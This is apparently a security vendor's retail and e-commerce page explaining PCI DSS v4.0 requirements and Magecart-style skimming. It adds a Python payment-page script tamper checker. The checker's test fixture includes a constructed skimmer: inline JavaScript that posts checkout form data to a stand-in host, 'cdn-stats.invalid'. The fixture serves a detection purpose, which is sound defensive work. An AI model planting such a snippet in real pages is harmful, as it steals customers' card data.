By Sector

    Retail and E-commerce

    Retail and e-commerce security focuses on payment flows, customer data, and platform availability, which are exactly the areas attackers target most, especially during peak seasons. We protect customer data, payment systems, and online platforms while helping you demonstrate PCI DSS compliance.

    Retail
    E-commerce security expertise
    PCI DSS compliance
    Payment security
    Customer data protection

    Sector Challenges We Address

    PCI DSS compliance requirements
    E-commerce platform vulnerabilities
    Customer data protection
    Payment fraud prevention
    Supply chain security
    Seasonal traffic and attack spikes

    Specialized Services

    PCI DSS Assessment

    Comprehensive testing to meet payment card industry requirements and protect cardholder data

    E-commerce Pentesting

    Security assessment of online stores, payment flows, and customer account systems

    Data Protection

    Customer data security assessment and GDPR compliance support

    Fraud Detection

    Assessment of fraud prevention controls and payment security measures

    PCI DSS v4.0: what changed

    PCI DSS v4.0 introduced significant new requirements that directly affect e-commerce operations. If your compliance program was last reviewed under v3.2.1, it needs to be updated.

    PCI DSS v3.2.1 retired 31 March 2024

    PCI DSS version 3.2.1 was retired on 31 March 2024. Any organization that processes, stores, or transmits cardholder data must now demonstrate compliance with PCI DSS v4.x. The transition is not optional: operating under v3.2.1 controls is no longer a valid compliance posture. Two later dates also matter: the requirements that v4.0 marked as future-dated became mandatory on 31 March 2025, and v4.0.1 (published June 2024) superseded v4.0 on 31 December 2024 with clarifications only, so the requirement numbers referenced below are unchanged.

    MFA now mandatory for all user access into the CDE

    PCI DSS v4.0 Requirement 8.4.2 mandates multi-factor authentication for all access into the cardholder data environment, not only administrative access. Under v3.2.1, MFA was required only for non-console administrative access to the CDE and for remote network access originating outside the entity's network, so an ordinary user authenticating from inside the corporate network, or an administrator at a local console, could reach the CDE with a password alone. Those accounts are now in scope. The requirement covers user accounts; application and system accounts performing automated functions are excluded from 8.4.2 but must still meet the Requirement 8 controls that apply to such accounts. Requirement 8.4.2 was future-dated and became mandatory on 31 March 2025.

    Script monitoring for payment pages is mandatory

    PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 require organizations to maintain an inventory of every script loaded and executed on payment pages with a written justification for each, to have a method to confirm that each script is authorized and its integrity is assured, and to run a change- and tamper-detection mechanism over the HTTP headers and script contents of those pages at least weekly. Both requirements were future-dated and became mandatory on 31 March 2025. They directly target Magecart-style skimming. Organizations using hosted checkout forms are not automatically exempt: the merchant page that embeds a payment service provider's iframe, or that redirects to a hosted checkout, is the page the customer's browser loads first, and a script injected into it can overlay or redirect the form before the provider's code runs, so that parent page is itself a payment page in scope.

    Attack patterns in retail

    Retail faces predictable attack patterns that align with business cycles. Testing at the right time and monitoring the right vectors reduces exposure when it matters most.

    Peak-season targeting

    Attackers plan campaigns around retail peak periods because transaction volumes are highest, security teams are stretched, and the financial impact of downtime or fraud is greatest. Account takeover campaigns, credential stuffing, and inventory fraud all spike during major retail events. Testing before peak periods ensures your defenses are verified while pressure is lowest.

    Payment form skimming

    Magecart-style attacks inject malicious JavaScript into checkout pages, through a compromised first-party asset, a third-party tag, or a dependency in the build pipeline, to capture payment card data in the browser as the customer types it, before it ever reaches the payment processor. Because the transaction still completes normally, neither the retailer nor the customer sees anything wrong, and skimmers have remained in place for months. PCI DSS v4.0 Requirements 6.4.3 and 11.6.1 specifically address this threat.
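    The script inventory and tamper check that Requirements 6.4.3 and 11.6.1 describe, and that the skimming scenario above is meant to catch, can be implemented as a small periodic job. The following is an added example, not code from this page or from any assessor or vendor: it derives an authorized inventory from an approved copy of the payment page (external script sources with their integrity attributes, plus a SHA-256 of each inline script body), then compares a freshly fetched copy against it and reports any script that is new, modified, or missing. Both HTML documents, the hostnames, and the integrity values are constructed for the example.

```python
"""Payment-page script inventory and tamper check (PCI DSS v4.0 req. 6.4.3 / 11.6.1).

Added example. Parses a payment page, records every <script> element, and
compares the result against an inventory built from an approved snapshot.
"""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collect <script> elements: src + integrity for external, body hash for inline."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._attrs = {}
        self._body = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._attrs = dict(attrs)
            self._body = []

    def handle_data(self, data):
        if self._in_script:          # HTMLParser hands script text to handle_data
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            src = self._attrs.get("src")
            if src:
                self.scripts.append({"kind": "external", "src": src,
                                     "integrity": self._attrs.get("integrity")})
            else:
                body = "".join(self._body).strip().encode()
                self.scripts.append({"kind": "inline",
                                     "sha256": hashlib.sha256(body).hexdigest()})
            self._in_script = False


def extract_scripts(html):
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def build_inventory(approved_html):
    """Authorized inventory from a reviewed, signed-off copy of the page (6.4.3)."""
    inventory = {"external": {}, "inline_sha256": set()}
    for s in extract_scripts(approved_html):
        if s["kind"] == "external":
            inventory["external"][s["src"]] = s["integrity"]
        else:
            inventory["inline_sha256"].add(s["sha256"])
    return inventory


def check_page(html, inventory):
    """Tamper check (11.6.1): return findings, empty list if the page matches the inventory."""
    findings = []
    seen = set()
    for s in extract_scripts(html):
        if s["kind"] == "external":
            seen.add(s["src"])
            if s["src"] not in inventory["external"]:
                findings.append("unauthorized external script: " + s["src"])
            else:
                expected = inventory["external"][s["src"]]
                if expected is not None and s["integrity"] != expected:
                    findings.append("integrity attribute changed: " + s["src"])
        elif s["sha256"] not in inventory["inline_sha256"]:
            findings.append("unauthorized or modified inline script: sha256=" + s["sha256"])
    for src in inventory["external"]:
        if src not in seen:   # a removed script (e.g. fraud-detection tag) is also a change
            findings.append("authorized script missing: " + src)
    return findings


# Constructed sample: the approved checkout page as signed off at the last review.
APPROVED_PAGE = """<!doctype html>
<html><head><title>Checkout</title>
<script src="https://js.psp.example/v3/checkout.js"
        integrity="sha384-CONSTRUCTED_SRI_VALUE_FOR_CHECKOUT_JS"
        crossorigin="anonymous"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body><form id="payment-form"></form></body></html>
"""

# Constructed sample: the same page after a Magecart-style injection. The inline
# script now posts the form to an exfiltration host, and a second script from
# that host has been added under a plausible-looking name.
SKIMMED_PAGE = """<!doctype html>
<html><head><title>Checkout</title>
<script src="https://js.psp.example/v3/checkout.js"
        integrity="sha384-CONSTRUCTED_SRI_VALUE_FOR_CHECKOUT_JS"
        crossorigin="anonymous"></script>
<script>window.dataLayer = window.dataLayer || [];
document.addEventListener("submit", function () {
  fetch("https://cdn-stats.invalid/c", {method: "POST",
        body: new FormData(document.getElementById("payment-form"))});
});</script>
<script src="https://cdn-stats.invalid/jquery.min.js"></script>
</head><body><form id="payment-form"></form></body></html>
"""

if __name__ == "__main__":
    inv = build_inventory(APPROVED_PAGE)
    print("approved page:", check_page(APPROVED_PAGE, inv) or "no findings")
    for finding in check_page(SKIMMED_PAGE, inv):
        print("skimmed page:", finding)
```

    In production the current copy would be fetched by a scheduler at least weekly (more often during peak season) and any non-empty result routed to an alert. Two caveats: the inventory must be rebuilt only through the change-control process that approves a new script, never from whatever is currently live, and a static fetch does not see scripts that another script inserts at runtime, so it should be paired with a browser-enforced Content-Security-Policy with reporting, or with a headless-browser capture of the fully rendered page.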

    Protect your e-commerce platform

    Secure customer data and payment systems.